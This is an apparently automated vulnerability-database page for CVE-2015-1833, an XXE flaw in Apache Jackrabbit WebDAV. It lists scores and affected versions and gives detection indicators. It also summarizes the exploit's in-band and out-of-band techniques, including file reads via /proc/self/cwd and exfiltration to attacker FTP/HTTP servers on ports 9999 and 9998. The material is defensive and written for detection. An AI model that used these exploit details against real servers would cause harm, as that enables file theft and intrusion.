cbcvebase.
CVE-2015-1833
published 2015-05-29

CVE-2015-1833: XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and…

PriorityP262medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
51.49%
98.8th percentile
XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to intranet servers via a crafted WebDAV request.

Affected

32 ranges· showing 25
VendorProductVersion rangeFixed in
apachejackrabbit<= 2.0.5
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit
apachejackrabbit

Detection & IOCsextracted from sources · hover to see the quote

path/proc/self/cwd
port9998
port9999
other220 xxe-ftp-server
  • Detect XXE exploitation attempts targeting WebDAV endpoints by monitoring PROPPATCH and PROPFIND HTTP requests containing XML with DOCTYPE/ENTITY declarations referencing external URIs (file://, http://, https://).
  • Alert on outbound FTP connections from the WebDAV server process to attacker-controlled hosts, particularly FTP banner '220 xxe-ftp-server', which is the OOB exfiltration channel used by the exploit.
  • Monitor HTTP requests to WebDAV endpoints with Content-Type: application/xml and HTTP verbs PROPPATCH or PROPFIND for embedded external entity references.
  • Detect file:// URI scheme usage within XML bodies of WebDAV requests, especially references to /proc/self/cwd, which the exploit uses to enumerate the server's working directory.
  • Flag WebDAV requests where the XML body contains URI schemes such as 'http(s)' or 'file' that could trigger internal network requests or file disclosure via XXE.
  • ·The exploit supports three techniques (inb1, inb2, oob) with different requirements: inb1 does not require attacker visibility but has content limitations; inb2 requires valid credentials and attacker-visible IP; oob works with anonymous credentials but is less stable.
  • ·The vulnerability affects not only Apache Jackrabbit directly but also software incorporating its WebDAV plugin, including Apache Sling and Adobe AEM.
  • ·The OOB technique uses an FTP server on the attacker side (default port 9999) and an HTTP server (default port 9998) to receive exfiltrated data; detection must account for both channels.

CVSS provenance

nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
osv6.4MEDIUM
vendor_debian6.4MEDIUM
vendor_redhat6.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.